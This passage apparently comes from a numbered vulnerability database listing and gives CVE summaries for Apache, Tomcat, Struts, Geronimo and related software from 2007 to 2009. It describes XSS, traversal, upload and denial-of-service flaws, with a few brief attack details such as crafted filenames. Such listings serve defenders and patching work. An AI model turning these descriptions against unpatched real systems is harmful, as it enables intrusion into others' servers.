5337| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
5338| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
5339| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
5340| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5341| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
5342| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
5343| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
5344| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
5345| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
5346| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
5347| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
5348| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
5349| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
5350| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
5351| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
5352| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
5353| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
5354| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
5355| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
5356| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
5357| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
5358| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
5359| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
5360| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
5361| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
5362| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
5363| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
5364| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
5365| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
5366| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
5367| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
5368| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
5369| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
5370| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
5371| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
5372| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
5373| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
5374| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
5375| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
5376| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
5377| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
5378| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
5379| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
5380| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
5381| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
5382| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
5383| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
5384| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
5385| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
5386| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
5387| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
5388| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
5389| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
5390| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
5391| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
5392| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
5393| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
5394| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
5395| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
5396| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
5397| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
5398| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
5399| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
5400| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
5401| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
5402| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
5403| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
5404| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
5405| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
5406| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
5407| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
5408| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
5409| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
5410| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
5411| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
5412| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
5413| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5414| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5415| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
5416| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
5417| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
5418| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
5419| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
5420| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
5421| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
5422| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
5423| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
5424| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
5425| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5426| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5427| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
5428| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
5429| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
5430| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5431| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
5432| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
5433| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
5434| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
5435| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
5436| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
5437| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
5438| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
5439| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5440| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
5441| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
5442| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
